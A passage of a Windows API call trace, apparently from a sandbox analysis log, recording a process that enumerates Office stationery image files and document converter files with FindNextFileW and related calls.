ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Monet.jpg", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc51dedf2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc51dedf2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1060, dwReserved0=0x0, dwReserved1=0x0, cFileName="Month_Calendar.emf", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc522b0ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc522b0ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x65b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.emf", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notebook.jpg", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0e3b3c, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa4cf00d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce109c99, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa51b2c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f0b40b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f0b40b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b55629, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pine_Lumber.jpg", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f31568, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f31568, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pretty_Peacock.jpg", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f7d822, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f7d822, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Psychedelic.jpg", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce12fdf6, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa567585, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53cdfab, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc53cdfab, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45148cd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sand_Paper.jpg", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5277366, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5277366, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4516ee37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x91c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Seyes.emf", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce17c0b0, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0053.909] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa58d6e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc530f8da, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc530f8da, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45194f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13d8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shorthand.emf", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc541a265, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc541a265, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x451bb0f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Small_News.jpg", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1a220d, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5b3841, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1c836a, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce4037dd, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce4037dd, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54403c2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54403c2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x452797c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x748, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stucco.gif", cAlternateFileName="")) returned 1 [0053.910] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc548c67c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc548c67c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4529f927, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tanspecks.jpg", cAlternateFileName="")) returned 1 [0053.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54b27d9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54b27d9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x121e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tiki.gif", cAlternateFileName="")) returned 1 [0053.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc535bb94, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc535bb94, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x6860, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.emf", cAlternateFileName="")) returned 1 [0053.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fea93, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54fea93, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457ae7a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0x0, dwReserved1=0x0, cFileName="White_Chocolate.jpg", cAlternateFileName="")) returned 1 [0053.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 1 [0053.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 0 [0053.911] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.911] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.911] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.911] CoTaskMemFree (pv=0x4e1c10) [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xcf518520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x23d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCONV97.DLL", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeaee00, ftCreationTime.dwHighDateTime=0x1ca9122, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1aeaee00, ftLastWriteTime.dwHighDateTime=0x1ca9122, nFileSizeHigh=0x0, nFileSizeLow=0x8f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECOVR32.CNV", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f938f00, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f938f00, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0xdfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wks9Pxy.cnv", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce200, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xc226ea20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56ce200, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x30170, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT532.CNV", cAlternateFileName="")) returned 1 [0053.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 1 [0053.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.913] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0053.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xcf518520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x23d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCONV97.DLL", cAlternateFileName="")) returned 1 [0053.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeaee00, ftCreationTime.dwHighDateTime=0x1ca9122, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1aeaee00, ftLastWriteTime.dwHighDateTime=0x1ca9122, nFileSizeHigh=0x0, nFileSizeLow=0x8f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECOVR32.CNV", cAlternateFileName="")) returned 1 [0053.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f938f00, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f938f00, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0xdfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wks9Pxy.cnv", cAlternateFileName="")) returned 1 [0053.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce200, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xc226ea20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56ce200, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x30170, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT532.CNV", cAlternateFileName="")) returned 1 [0053.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 1 [0053.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 0 [0053.914] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.914] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.914] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.914] CoTaskMemFree (pv=0x4e1c10) [0053.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, 